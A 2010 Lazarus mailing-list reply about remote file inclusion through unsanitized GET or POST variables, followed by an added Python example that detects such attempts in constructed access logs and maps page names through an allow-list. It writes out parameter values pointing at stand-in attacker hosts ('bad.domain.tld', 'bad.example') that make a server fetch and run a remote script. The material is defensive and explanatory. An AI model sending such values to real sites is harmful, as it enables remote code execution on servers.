On 1/28/2010 02:55, Matt Shaffer wrote:
Right, but what I meant was if someone manages to upload their own PHP
file to the lazarus server, they can easily have uploaded a PHP file
manager which has the capability of deleting files, etc, without ever
needing ssh/ftp (this assumes the attack was done through a vulnerable
piece of software, that had write permissions, etc.)
I don't think this scenario is extremely likely.

What is there to upload? All it takes is a var that is not properly sanitized
that references a shell script on another site which then executes in the
context of the server with the bad code... This is all too common an occurrence
as my IDS shows on my practically invisible site... This isn't SQL injection or
anything like that but simply stuffing a POST or GET var with something like
"hxxp://bad.domain.tld/shell_script" and having the code actually get it and
execute it...
Proper sanitizing of ALL vars, whether user input or "hidden", must be done in
any web application to ensure that what is being received is valid for the
application...
--
_______________________________________________
Lazarus mailing list
[email protected]
http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
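An added example, not code from this thread or from the Lazarus project: it scans constructed Apache-style access-log lines for the pattern the reply describes (a GET var whose decoded value points at a script on another site) and shows the allow-list mapping that keeps such a value from ever reaching an include. The parameter names, page names and log entries are assumptions made for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines for the demonstration; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jan/2010:02:55:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Jan/2010:02:56:10 +0000] "GET /index.php?page=http://bad.example/shell_script HTTP/1.1" 200 1024 "-" "curl/7.19"
203.0.113.9 - - [28/Jan/2010:02:57:42 +0000] "GET /view.php?tpl=%68ttp%3A%2F%2Fbad.example%2Fs.txt%3F HTTP/1.1" 200 1024 "-" "curl/7.19"
198.51.100.2 - - [28/Jan/2010:03:00:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that, once percent-decoded, names a resource on another host.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_inclusion_attempts(log_text):
    """Return (client_ip, parameter, decoded_value) for every GET parameter
    whose value points at another site. POST bodies are not written to access
    logs, so this covers only the GET side of what the message describes."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so %68ttp%3A%2F%2F is seen as http://
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((client_ip, name, value))
    return hits


# Mitigation side: never hand the raw variable to include(); map it through an
# allow-list so only known local files can be selected (assumed page names).
ALLOWED_PAGES = {"about": "about.php", "contact": "contact.php"}


def resolve_page(param):
    """Return the local file for an allowed page name, or None for anything else."""
    return ALLOWED_PAGES.get(param)


if __name__ == "__main__":
    for ip, name, value in find_remote_inclusion_attempts(SAMPLE_LOG):
        print(f"{ip} tried to load a remote resource via {name}={value}")
```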